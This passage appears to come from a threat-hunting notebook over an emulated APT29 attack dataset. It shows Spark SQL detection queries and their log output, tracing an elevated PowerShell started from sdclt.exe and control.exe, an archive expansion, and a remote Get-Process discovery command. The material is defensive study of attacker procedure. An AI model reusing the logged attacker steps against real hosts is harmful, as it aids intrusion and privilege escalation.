 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="275"
 
-RECORD 69----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 70----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="274"
 
-RECORD 71----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 72----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="273"
 
-RECORD 73----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 74----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="272"
 
-RECORD 75----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 76----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="271"
 
-RECORD 77----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 78----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="270"
 
-RECORD 79----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 80----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="269"
 
-RECORD 81----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 82----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="268"
 
-RECORD 83----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 84----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="267"
 
-RECORD 85----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 86----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="266"
 
-RECORD 87----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 88----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="265"
 
-RECORD 89----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 90----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="264"
 
-RECORD 91----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="86"
                                                                                                                                                                                                                                                                 
-RECORD 92----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="263"
 
-RECORD 93----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 94----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="262"
 
-RECORD 95----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 96----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="261"
 
-RECORD 97----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="85"
                                                                                                                                                                                                                                                                 
-RECORD 98----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="260"
 
-RECORD 99----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="84"
                                                                                                                                                                                                                                                                 
only showing top 100 rows

Query ID:4310F2AF-11EF-4EAC-A968-3436FE5F6140

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
    FROM apt29Host d
    INNER JOIN(
      SELECT a.ProcessId, a.NewProcessId
      FROM apt29Host a
      INNER JOIN (
        SELECT NewProcessId
        FROM apt29Host
        WHERE LOWER(Channel) = "security"
            AND EventID = 4688
            AND LOWER(NewProcessName) LIKE "%control.exe"
            AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
      ) b
      ON a.ProcessId = b.NewProcessId
      WHERE LOWER(a.Channel) = "security"
        AND a.EventID = 4688
        AND a.MandatoryLabel = "S-1-16-12288"
        AND a.TokenElevationType = "%%1937"
    ) c
    ON d.ProcessId = c.NewProcessId
    WHERE LOWER(d.Channel) = "security"
      AND d.EventID = 4688
      AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%expand-archive%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Expand-Archive -LiteralPath "$env:USERPROFILE\Downloads\SysinternalsSuite.zip" -DestinationPath "$env:USERPROFILE\Downloads\"

ScriptBlock ID: 63fc6cf4-cd9f-4134-9231-51ccb5c7d247
Path:  

4.B.1. Process Discovery

Procedure: Enumerated current running processes using PowerShell

Criteria: powershell.exe executing Get-Process

Detection Type:Telemetry(Correlated)

Query ID:CE6D61C3-C3B5-43D2-BD3C-4C1711A822DA

df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4104
    AND LOWER(f.ScriptBlockText) LIKE "%get-process%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
Invoke-Command -ComputerName NASHUA -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId

ScriptBlock ID: 806f4593-7cce-4e2c-8645-8cb798c3bedd
Path:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
